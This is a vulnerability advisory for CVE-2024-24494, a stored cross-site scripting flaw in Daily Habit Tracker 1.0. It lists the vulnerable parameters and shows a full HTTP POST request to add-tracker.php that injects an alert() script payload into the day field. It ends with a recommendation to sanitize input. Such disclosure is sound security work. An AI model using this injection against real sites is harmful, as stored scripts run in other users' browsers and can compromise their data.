# Exploit Title: Daily Habit Tracker 1.0 - Stored Cross-Site Scripting (XSS)
# Date: 2 Feb 2024
# Exploit Author: Yevhenii Butenko
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html
# Version: 1.0
# Tested on: Debian
# CVE : CVE-2024-24494

### Stored Cross-Site Scripting (XSS):

> Stored Cross-Site Scripting (XSS) is a web security vulnerability where an attacker injects malicious scripts into a web application's database. The malicious script is saved on the server and later rendered in other users' browsers. When other users access the affected page, the stored script executes, potentially stealing data or compromising user security.

### Affected Components:

> add-tracker.php, update-tracker.php

Vulnerable parameters:
- day
- exercise
- pray
- read_book
- vitamins
- laundry
- alcohol
- meat

### Description:

> Multiple parameters within `Add Tracker` and `Update Tracker` requests are vulnerable to Stored Cross-Site Scripting. The application failed to sanitize user input while storing it to the database and reflecting back on the page.

## Proof of Concept:

The following payload `<script>alert('STORED_XSS')</script>` can be used in order to exploit the vulnerability.

Below is an example of a request demonstrating how a malicious payload can be stored within the `day` value:

```
POST /habit-tracker/endpoint/add-tracker.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 175
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/habit-tracker/home.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

date=1992-01-12&day=Tuesday%3Cscript%3Ealert%28%27STORED_XSS%27%29%3C%2Fscript%3E&exercise=Yes&pray=Yes&read_book=Yes&vitamins=Yes&laundry=Yes&alcohol=Yes&meat=Yes
```

![XSS Fired](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/xss.png?raw=true)

## Recommendations

When using this tracking system, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.